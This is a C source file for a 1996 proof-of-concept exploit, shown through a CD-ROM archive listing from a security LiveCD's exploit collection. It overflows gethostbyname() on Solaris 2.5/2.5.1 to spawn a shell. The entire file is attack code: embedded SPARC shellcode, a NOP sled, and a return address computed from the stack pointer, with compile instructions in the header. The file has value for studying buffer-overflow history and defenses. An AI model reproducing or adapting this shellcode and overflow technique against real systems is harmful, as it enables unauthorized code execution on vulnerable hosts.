home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / ovf.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  68 lines

  1. /*
  2.  * overflow-demo.c: demonstrates the buffer overrun of gethostbyname()
  3.  * in Solaris 2.5/2.5.1.  This should execute a subshell of the same userid
  4.  * as the calling program.
  5.  *
  6.  * gcc -o overflow-demo overflow-demo.c -lnsl
  7.  *
  8.  * Jeremy Elson, 18 Nov 1996
  9.  * jeremy.elson@nih.gov
  10.  */
  11.  
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <sys/types.h>
  15. #include <unistd.h>
  16. #include <sys/types.h>
  17. #include <sys/socket.h>
  18. #include <netinet/in.h>
  19. #include <arpa/inet.h>
  20. #include <netdb.h>
  21.  
  22.  
  23. #define BUF_LENGTH      8200
  24. #define EXTRA           100
  25. #define SPARC_NOP       0xa61cc013
  26. #define STACK_OFFSET    4000
  27.  
  28. u_char sparc_shellcode[] =
  29.   "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  30.   "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  31.   "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  32.   "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  33.   "\x82\x10\x20\x3b\x91\xd4\xff\xff";
  34.  
  35. u_long get_sp(void)
  36. {
  37.   __asm__("mov %sp,%i0 \n");
  38. }
  39.  
  40.  
  41. void main(int argc, char *argv[])
  42. {
  43.   char buf[BUF_LENGTH + EXTRA];
  44.   long targ_addr;
  45.   u_long *long_p;
  46.   u_char *char_p;
  47.   int i, code_length = strlen(sparc_shellcode);
  48.  
  49.   long_p = (u_long *) buf;
  50.  
  51.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  52.     *long_p++ = SPARC_NOP;
  53.  
  54.   char_p = (u_char *) long_p;
  55.  
  56.   for (i = 0; i < code_length; i++)
  57.     *char_p++ = sparc_shellcode[i];
  58.  
  59.   long_p = (u_long *) char_p;
  60.  
  61.   targ_addr = get_sp() - STACK_OFFSET;
  62.   for (i = 0; i < EXTRA / sizeof(u_long); i++)
  63.     *long_p++ = targ_addr;
  64.  
  65.   printf("Jumping to address 0x%lx\n", targ_addr);
  66.   gethostbyname(buf);
  67. }
  68. /*                    www.hack.co.za              [2000]*/